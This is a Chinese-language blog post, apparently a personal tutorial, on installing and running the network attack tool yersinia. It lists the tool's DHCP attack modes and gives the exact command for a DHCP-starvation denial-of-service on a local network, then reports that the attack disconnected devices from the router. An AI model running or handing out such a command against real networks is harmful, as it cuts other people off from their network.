yersinia 的安装与使用

怎么说,最近才看到这个工具确实我有点丢人了(,网上资料比较少,写一份顺便自己看。
博主配置是Fedora 25,所以就是dnf install yersinia 就完成了安装,不过不知道为什么yersinia基于GTK的图形界面打不开,有点心烦,那就命令行解决得了。
首先你得有个局域网(不然sample没效果),ifconfig查看网卡顺便记住interface。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[root@102 laplacence]# ifconfig
enp3s0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 44:8a:5b:f0:ac:e3 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 71 bytes 7207 (7.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 71 bytes 7207 (7.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

virbr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.122.1 netmask 255.255.255.0 broadcast 192.168.122.255
ether 52:54:00:8d:e3:86 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlp5s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.104 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::e4a:c8f:aed6:53bf prefixlen 64 scopeid 0x20<link>
ether f0:42:1c:e1:2c:56 txqueuelen 1000 (Ethernet)
RX packets 77859 bytes 97739807 (93.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1006468 bytes 299830684 (285.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

博主现在是wlp5s0在用网络,就默默记下了这个interface 后面会用到的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[root@102 laplacence]# yersinia -h

Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
-V Program version.
-h This help screen.
-G Graphical mode (GTK).
-I Interactive mode (ncurses).
-D Daemon mode.
-d Debug.
-l logfile Select logfile.
-c conffile Select config file.
protocol One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.

Try 'yersinia protocol -h' to see protocol_options help

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>



MOTD: Who dares wins

umm,很有*nix风的一个help((。
测试一个arp欺骗好了。根据help写上protocol

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[root@102 laplacence]# yersinia dhcp -h

Usage: yersinia dhcp [-h -M] [-attack id] [-source arg] [-dest arg] [-ipsource arg] [-ipdest arg] [-sport arg] [-dport arg] [-opcode arg] [-htype arg] [-hlen arg] [-hops arg] [-xid arg] [-secs arg] [-flags arg] [-ci arg] [-yi arg] [-si arg] [-gi arg] [-ch arg] [-interface arg]
-h This help screen.
-M Disable MAC address spoofing.

Use '?' as parameter argument if you would like to display the parameter help.

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>



MOTD: Do you have an ISL capable Cisco switch? Share it!! ;)

然后是-attack和其参数,

1
2
3
4
5
6
7
8
[root@102 laplacence]# yersinia dhcp -attack ?
<0> NONDOS attack sending RAW packet
<1> DOS attack sending DISCOVER packet
<2> NONDOS attack creating DHCP rogue server
<3> DOS attack sending RELEASE packet


MOTD: Ghosts'n'Goblins, Trojan, Out Run, Bump'n'jump, Side Arms...

这里用1就行,反正是个sample嘛((。

1
2
3
[root@102 laplacence]# yersinia dhcp -attack 1 -interface wlp5s0
<*> Starting DOS attack sending DISCOVER packet...
<*> Press any key to stop the attack <*>

因为router只能通过upnp来控制,所以攻击开始后根本进不去。。只能靠现象来看结果,结果是,两台手机都掉线,攻击5s后(这个router的dhcp池只有99个)就连攻击机本机都掉线了,有线(大概是static)貌似不受影响。